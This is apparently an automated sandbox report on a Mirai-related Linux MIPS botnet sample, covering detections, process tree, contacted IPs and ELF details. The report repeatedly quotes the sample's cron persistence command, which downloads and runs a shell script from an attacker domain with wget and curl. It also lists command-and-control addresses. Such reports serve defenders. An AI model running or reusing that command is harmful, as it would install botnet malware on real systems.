Edit tour

Linux Analysis Report
nshkmips.elf

Overview

General Information

Sample name:	nshkmips.elf
Analysis ID:	1577030
MD5:	296314df0b5078410e293db42ef8dc51
SHA1:	55ec777021fa776446a47eba09d686b21c12825a
SHA256:	727866578de01bce8d81762adff405eae9afac8ceeea81deb92955d982be421d
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Connects to many ports of the same IP (likely port scanning)

Executes the "crontab" command typically for achieving persistence

Sample tries to persist itself using cron

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Executes the "rm" command used to delete files or directories

Found strings indicative of a multi-platform dropper

Sample has stripped symbol table

Sample listens on a socket

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577030
Start date and time:	2024-12-17 21:42:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	nshkmips.elf
Detection:	MAL
Classification:	mal68.troj.linELF@0/1@17/0

Warnings

VT rate limit hit for: nshkmips.elf

Runtime Messages

Command:	/tmp/nshkmips.elf
PID:	6208
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	you are now apart of hail cock botnet
Standard Error:	no crontab for root

Process Tree

system is lnxubuntu20

dash New Fork (PID: 6188, Parent: 4331)

rm (PID: 6188, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.24FY65F9IU /tmp/tmp.dFfaOL50Ud /tmp/tmp.PCCj74KoGG

dash New Fork (PID: 6189, Parent: 4331)

rm (PID: 6189, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.24FY65F9IU /tmp/tmp.dFfaOL50Ud /tmp/tmp.PCCj74KoGG

nshkmips.elf (PID: 6208, Parent: 6124, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/nshkmips.elf

nshkmips.elf New Fork (PID: 6210, Parent: 6208)

sh (PID: 6210, Parent: 6208, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

sh New Fork (PID: 6216, Parent: 6210)

sh New Fork (PID: 6218, Parent: 6216)

crontab (PID: 6218, Parent: 6216, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 6217, Parent: 6210)

crontab (PID: 6217, Parent: 6210, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

nshkmips.elf New Fork (PID: 6219, Parent: 6208)

nshkmips.elf New Fork (PID: 6262, Parent: 6219)

nshkmips.elf New Fork (PID: 6220, Parent: 6208)

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: nshkmips.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: nshkmips.elf

ReversingLabs: Detection: 21%

Source: tmp.yuaIDk.22.dr

String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 80.78.26.121 ports 9421,18670,5169,9153,1,3,5,9
Source: global traffic	TCP traffic: 212.64.215.71 ports 4067,3243,1,4,5,6,15466,13743

Source: global traffic	TCP traffic: 192.168.2.23:57590 -> 80.78.26.121:9153
Source: global traffic	TCP traffic: 192.168.2.23:43534 -> 212.64.215.71:15466

Source: /tmp/nshkmips.elf (PID: 6208)

Socket: 127.0.0.1:1172

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	UDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknown	UDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknown	UDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknown	UDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknown	UDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknown	UDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknown	UDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknown	UDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknown	UDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknown	UDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknown	UDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknown	UDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknown	UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknown	UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown	UDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknown	UDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknown	UDP traffic detected without corresponding DNS query: 70.34.254.19

Source: global traffic

DNS traffic detected: DNS query: kingstonwikkerink.dyn

Source: tmp.yuaIDk.22.dr

String found in binary or memory: http://hailcocks.ru/wget.sh;

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal68.troj.linELF@0/1@17/0

Persistence and Installation Behavior

Executes the "crontab" command typically for achieving persistence

Source: /bin/sh (PID: 6218)	Crontab executable: /usr/bin/crontab -> crontab -l			Jump to behavior
Source: /bin/sh (PID: 6217)	Crontab executable: /usr/bin/crontab -> crontab -			Jump to behavior

Sample tries to persist itself using cron

Source: /usr/bin/crontab (PID: 6217)	File: /var/spool/cron/crontabs/tmp.yuaIDk			Jump to behavior
Source: /usr/bin/crontab (PID: 6217)	File: /var/spool/cron/crontabs/root			Jump to behavior

Source: /tmp/nshkmips.elf (PID: 6210)

Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

Jump to behavior

Source: /usr/bin/dash (PID: 6188)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.24FY65F9IU /tmp/tmp.dFfaOL50Ud /tmp/tmp.PCCj74KoGG			Jump to behavior
Source: /usr/bin/dash (PID: 6189)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.24FY65F9IU /tmp/tmp.dFfaOL50Ud /tmp/tmp.PCCj74KoGG			Jump to behavior

Source: submitted sample

Stderr: no crontab for root: exit code = 0

Source: /tmp/nshkmips.elf (PID: 6208)

Queries kernel information via 'uname':

Jump to behavior

Source: nshkmips.elf, 6208.1.000055dc5d7ce000.000055dc5d877000.rw-.sdmp, nshkmips.elf, 6219.1.000055dc5d7ce000.000055dc5d877000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mips
Source: nshkmips.elf, 6208.1.000055dc5d7ce000.000055dc5d877000.rw-.sdmp, nshkmips.elf, 6219.1.000055dc5d7ce000.000055dc5d877000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: nshkmips.elf, 6208.1.00007fff08e71000.00007fff08e92000.rw-.sdmp, nshkmips.elf, 6219.1.00007fff08e71000.00007fff08e92000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/nshkmips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nshkmips.elf
Source: nshkmips.elf, 6208.1.00007fff08e71000.00007fff08e92000.rw-.sdmp, nshkmips.elf, 6219.1.00007fff08e71000.00007fff08e92000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	1 File Deletion	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
nshkmips.elf	21%	ReversingLabs	Linux.Backdoor.Mirai
nshkmips.elf	100%	Avira	EXP/ELF.Agent.J.8

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kingstonwikkerink.dyn	212.64.215.71	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://hailcocks.ru/wget.sh;	tmp.yuaIDk.22.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
80.78.26.121	unknown	Cyprus	37560	CYBERDYNELR	true
212.64.215.71	kingstonwikkerink.dyn	Turkey	15395	RACKSPACE-LONGB	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
80.78.26.121	nshkarm7.elf	Get hash	malicious	Unknown	Browse
	nshkarm5.elf	Get hash	malicious	Unknown	Browse
	nshkarm.elf	Get hash	malicious	Unknown	Browse
212.64.215.71	nshkarm7.elf	Get hash	malicious	Unknown	Browse
	nshkarm5.elf	Get hash	malicious	Unknown	Browse
	nshkarm.elf	Get hash	malicious	Unknown	Browse
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
91.189.91.43	la.bot.arm5.elf	Get hash	malicious	Mirai	Browse
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse
	cmc.elf	Get hash	malicious	Unknown	Browse
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse
	la.bot.m68k.elf	Get hash	malicious	Mirai	Browse
	la.bot.sh4.elf	Get hash	malicious	Mirai	Browse
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse
	la.bot.arm.elf	Get hash	malicious	Mirai	Browse
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse
	la.bot.arm6.elf	Get hash	malicious	Mirai	Browse
91.189.91.42	la.bot.arm5.elf	Get hash	malicious	Mirai	Browse
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse
	cmc.elf	Get hash	malicious	Unknown	Browse
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse
	la.bot.m68k.elf	Get hash	malicious	Mirai	Browse
	la.bot.sh4.elf	Get hash	malicious	Mirai	Browse
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse
	la.bot.arm.elf	Get hash	malicious	Mirai	Browse
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse
	la.bot.arm6.elf	Get hash	malicious	Mirai	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
kingstonwikkerink.dyn	nshkarm7.elf	Get hash	malicious	Unknown	Browse	80.78.26.121
	nshkarm5.elf	Get hash	malicious	Unknown	Browse	80.78.26.121
	nshkarm.elf	Get hash	malicious	Unknown	Browse	80.78.26.121

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	la.bot.arm5.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	cmc.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	la.bot.m68k.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	la.bot.sparc.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	la.bot.sh4.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	la.bot.arm.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
CANONICAL-ASGB	la.bot.arm5.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	cmc.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	la.bot.m68k.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	la.bot.sparc.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	la.bot.sh4.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	la.bot.arm.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
RACKSPACE-LONGB	nshkarm7.elf	Get hash	malicious	Unknown	Browse	212.64.215.71
	nshkarm5.elf	Get hash	malicious	Unknown	Browse	212.64.215.71
	nshkarm.elf	Get hash	malicious	Unknown	Browse	212.64.215.71
	i686.elf	Get hash	malicious	Mirai	Browse	92.52.99.131
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	89.234.28.7
	Josho.arm.elf	Get hash	malicious	Unknown	Browse	89.234.45.46
	https://reviewgustereports.com/	Get hash	malicious	CAPTCHA Scam ClickFix, XWorm	Browse	134.213.193.62
	meerkat.mips.elf	Get hash	malicious	Mirai	Browse	134.213.250.148
	sparc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	162.13.153.221
	teste.x86.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	92.52.99.126
CYBERDYNELR	nshkarm7.elf	Get hash	malicious	Unknown	Browse	80.78.26.121
	nshkarm5.elf	Get hash	malicious	Unknown	Browse	80.78.26.121
	nshkarm.elf	Get hash	malicious	Unknown	Browse	80.78.26.121
	GjNVpV53SR.exe	Get hash	malicious	Quasar	Browse	80.78.28.83
	p-p.c-440.DUSK.elf	Get hash	malicious	Gafgyt, Mirai	Browse	185.193.127.129
	PhysXCooking64.dll.dll	Get hash	malicious	Bazar Loader	Browse	80.78.24.30
	FW3x3p4eZ5.msi	Get hash	malicious	Bazar Loader, BruteRatel	Browse	80.78.24.30
	PhysXCooking64.dll.dll	Get hash	malicious	Bazar Loader, BruteRatel	Browse	80.78.24.30
	na.elf	Get hash	malicious	Gafgyt, Mirai	Browse	185.193.127.129
	na.elf	Get hash	malicious	Gafgyt, Mirai	Browse	185.193.127.129
INIT7CH	la.bot.arm5.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	cmc.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	la.bot.m68k.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	la.bot.sh4.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	la.bot.arm.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	la.bot.arm6.elf	Get hash	malicious	Mirai	Browse	109.202.202.202

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/var/spool/cron/crontabs/tmp.yuaIDk

Download File

Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	306
Entropy (8bit):	5.140730820656145
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQLvmUZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsV:8QjHig8S8eHLUHYC+GABjnOGAFkz
MD5:	B1713A8BCF78C93DC490E0B1D4720C37
SHA1:	9522C497950637D4D4A1235462B40E395FAEAF22
SHA-256:	5D415CF59C3A287D952E7480A2801A393B2C98ECD7BF3D62CD61CDBE0FC0AADD
SHA-512:	78C284FEC0FACF634BC82FE94466A091737541ECA7313D2DB92E4FD60866E0C63FBEDC66F1C6457B7594595FE42C41E0B6ADD3CC199346CF15477FF3BDD7736C
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Dec 17 14:42:44 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.

Static File Info

General

File type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.516087912436742
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	nshkmips.elf
File size:	97'508 bytes
MD5:	296314df0b5078410e293db42ef8dc51
SHA1:	55ec777021fa776446a47eba09d686b21c12825a
SHA256:	727866578de01bce8d81762adff405eae9afac8ceeea81deb92955d982be421d
SHA512:	06cf37a549e24bc873e22572bbb40c10516b01275849e4091eb5bb8d829fd5752b85d1541abbb2261c6db2d83b6b642f4323498ac68ccc7c6a7ebab0cb2c6dee
SSDEEP:	1536:jZHf/la6kfjZCKPxIf4XhSlSfa5eu5e+Oe9MGSKmtsgrRrefPvgEA9rBEk:NE/C/SfuSKmtttMILrBEk
TLSH:	6F93B81E6E218FBDF768C33447B78A21A35937D223E1D685D26CD2105F6028E585FFA8
File Content Preview:	.ELF.....................@.`...4..z......4. ...(.............@...@....m...m...............p..Ep..Ep....P..[.........dt.Q............................<...'..\...!'.......................<...'..8...!... ....'9... ......................<...'......!........'9Q

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400260
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	96948
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0x15130	0x0	0x6	AX	16
.fini	PROGBITS	0x415250	0x15250	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x4152b0	0x152b0	0x1b40	0x0	0x2	A	16
.ctors	PROGBITS	0x457000	0x17000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x457008	0x17008	0x8	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x457014	0x17014	0x10	0x0	0x3	WA	4
.data	PROGBITS	0x457030	0x17030	0x3c8	0x0	0x3	WA	16
.got	PROGBITS	0x457400	0x17400	0x650	0x4	0x10000003	WAp	16
.sbss	NOBITS	0x457a50	0x17a50	0x2c	0x0	0x10000003	WAp	4
.bss	NOBITS	0x457a80	0x17a50	0x5148	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0xcde	0x17a50	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x17a50	0x64	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x16df0	0x16df0	5.5685	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x17000	0x457000	0x457000	0xa50	0x5bc8	3.7125	0x6	RW	0x10000	.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 21:42:44.393347025 CET	43928	443	192.168.2.23	91.189.91.42
Dec 17, 2024 21:42:45.268177986 CET	57590	9153	192.168.2.23	80.78.26.121
Dec 17, 2024 21:42:45.382745981 CET	57592	9153	192.168.2.23	80.78.26.121
Dec 17, 2024 21:42:45.387842894 CET	9153	57590	80.78.26.121	192.168.2.23
Dec 17, 2024 21:42:45.387929916 CET	57590	9153	192.168.2.23	80.78.26.121
Dec 17, 2024 21:42:45.388185024 CET	57590	9153	192.168.2.23	80.78.26.121
Dec 17, 2024 21:42:45.502451897 CET	9153	57592	80.78.26.121	192.168.2.23
Dec 17, 2024 21:42:45.502705097 CET	57592	9153	192.168.2.23	80.78.26.121
Dec 17, 2024 21:42:45.502985001 CET	57592	9153	192.168.2.23	80.78.26.121
Dec 17, 2024 21:42:45.507651091 CET	9153	57590	80.78.26.121	192.168.2.23
Dec 17, 2024 21:42:45.507831097 CET	57590	9153	192.168.2.23	80.78.26.121
Dec 17, 2024 21:42:45.838778973 CET	9153	57592	80.78.26.121	192.168.2.23
Dec 17, 2024 21:42:45.838810921 CET	9153	57590	80.78.26.121	192.168.2.23
Dec 17, 2024 21:42:45.839204073 CET	57592	9153	192.168.2.23	80.78.26.121
Dec 17, 2024 21:42:45.958986044 CET	9153	57592	80.78.26.121	192.168.2.23
Dec 17, 2024 21:42:47.063010931 CET	9153	57592	80.78.26.121	192.168.2.23
Dec 17, 2024 21:42:47.063268900 CET	57592	9153	192.168.2.23	80.78.26.121
Dec 17, 2024 21:42:47.063436985 CET	57592	9153	192.168.2.23	80.78.26.121
Dec 17, 2024 21:42:50.024578094 CET	42836	443	192.168.2.23	91.189.91.43
Dec 17, 2024 21:42:51.560338974 CET	42516	80	192.168.2.23	109.202.202.202
Dec 17, 2024 21:42:52.386653900 CET	43534	15466	192.168.2.23	212.64.215.71
Dec 17, 2024 21:42:52.506289959 CET	15466	43534	212.64.215.71	192.168.2.23
Dec 17, 2024 21:42:52.506483078 CET	43534	15466	192.168.2.23	212.64.215.71
Dec 17, 2024 21:42:52.506563902 CET	43534	15466	192.168.2.23	212.64.215.71
Dec 17, 2024 21:42:52.626228094 CET	15466	43534	212.64.215.71	192.168.2.23
Dec 17, 2024 21:42:52.626621008 CET	43534	15466	192.168.2.23	212.64.215.71
Dec 17, 2024 21:42:52.746418953 CET	15466	43534	212.64.215.71	192.168.2.23
Dec 17, 2024 21:42:54.844172001 CET	15466	43534	212.64.215.71	192.168.2.23
Dec 17, 2024 21:42:54.845128059 CET	43534	15466	192.168.2.23	212.64.215.71
Dec 17, 2024 21:42:54.965085030 CET	15466	43534	212.64.215.71	192.168.2.23
Dec 17, 2024 21:42:55.388900995 CET	57590	9153	192.168.2.23	80.78.26.121
Dec 17, 2024 21:42:55.508999109 CET	9153	57590	80.78.26.121	192.168.2.23
Dec 17, 2024 21:42:55.812562943 CET	9153	57590	80.78.26.121	192.168.2.23
Dec 17, 2024 21:42:55.812851906 CET	57590	9153	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:00.090342999 CET	56410	4067	192.168.2.23	212.64.215.71
Dec 17, 2024 21:43:00.210127115 CET	4067	56410	212.64.215.71	192.168.2.23
Dec 17, 2024 21:43:00.210226059 CET	56410	4067	192.168.2.23	212.64.215.71
Dec 17, 2024 21:43:00.210274935 CET	56410	4067	192.168.2.23	212.64.215.71
Dec 17, 2024 21:43:00.330074072 CET	4067	56410	212.64.215.71	192.168.2.23
Dec 17, 2024 21:43:00.330296040 CET	56410	4067	192.168.2.23	212.64.215.71
Dec 17, 2024 21:43:00.450124979 CET	4067	56410	212.64.215.71	192.168.2.23
Dec 17, 2024 21:43:02.516232014 CET	4067	56410	212.64.215.71	192.168.2.23
Dec 17, 2024 21:43:02.516827106 CET	56410	4067	192.168.2.23	212.64.215.71
Dec 17, 2024 21:43:02.636936903 CET	4067	56410	212.64.215.71	192.168.2.23
Dec 17, 2024 21:43:04.870582104 CET	43928	443	192.168.2.23	91.189.91.42
Dec 17, 2024 21:43:12.771760941 CET	44468	13743	192.168.2.23	212.64.215.71
Dec 17, 2024 21:43:12.891463995 CET	13743	44468	212.64.215.71	192.168.2.23
Dec 17, 2024 21:43:12.891699076 CET	44468	13743	192.168.2.23	212.64.215.71
Dec 17, 2024 21:43:12.891784906 CET	44468	13743	192.168.2.23	212.64.215.71
Dec 17, 2024 21:43:13.011647940 CET	13743	44468	212.64.215.71	192.168.2.23
Dec 17, 2024 21:43:13.011991024 CET	44468	13743	192.168.2.23	212.64.215.71
Dec 17, 2024 21:43:13.133620977 CET	13743	44468	212.64.215.71	192.168.2.23
Dec 17, 2024 21:43:15.203712940 CET	13743	44468	212.64.215.71	192.168.2.23
Dec 17, 2024 21:43:15.204220057 CET	44468	13743	192.168.2.23	212.64.215.71
Dec 17, 2024 21:43:15.324317932 CET	13743	44468	212.64.215.71	192.168.2.23
Dec 17, 2024 21:43:17.156886101 CET	42836	443	192.168.2.23	91.189.91.43
Dec 17, 2024 21:43:21.252156973 CET	42516	80	192.168.2.23	109.202.202.202
Dec 17, 2024 21:43:35.470153093 CET	39902	3243	192.168.2.23	212.64.215.71
Dec 17, 2024 21:43:35.591859102 CET	3243	39902	212.64.215.71	192.168.2.23
Dec 17, 2024 21:43:35.592128038 CET	39902	3243	192.168.2.23	212.64.215.71
Dec 17, 2024 21:43:35.592329025 CET	39902	3243	192.168.2.23	212.64.215.71
Dec 17, 2024 21:43:35.712074995 CET	3243	39902	212.64.215.71	192.168.2.23
Dec 17, 2024 21:43:35.712397099 CET	39902	3243	192.168.2.23	212.64.215.71
Dec 17, 2024 21:43:35.832220078 CET	3243	39902	212.64.215.71	192.168.2.23
Dec 17, 2024 21:43:37.907303095 CET	3243	39902	212.64.215.71	192.168.2.23
Dec 17, 2024 21:43:37.907634974 CET	39902	3243	192.168.2.23	212.64.215.71
Dec 17, 2024 21:43:38.030082941 CET	3243	39902	212.64.215.71	192.168.2.23
Dec 17, 2024 21:43:43.151565075 CET	58098	5169	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:43.271231890 CET	5169	58098	80.78.26.121	192.168.2.23
Dec 17, 2024 21:43:43.271630049 CET	58098	5169	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:43.271683931 CET	58098	5169	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:43.391304016 CET	5169	58098	80.78.26.121	192.168.2.23
Dec 17, 2024 21:43:43.391460896 CET	58098	5169	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:43.511298895 CET	5169	58098	80.78.26.121	192.168.2.23
Dec 17, 2024 21:43:44.599991083 CET	5169	58098	80.78.26.121	192.168.2.23
Dec 17, 2024 21:43:44.600578070 CET	58098	5169	192.168.2.23	80.78.26.121
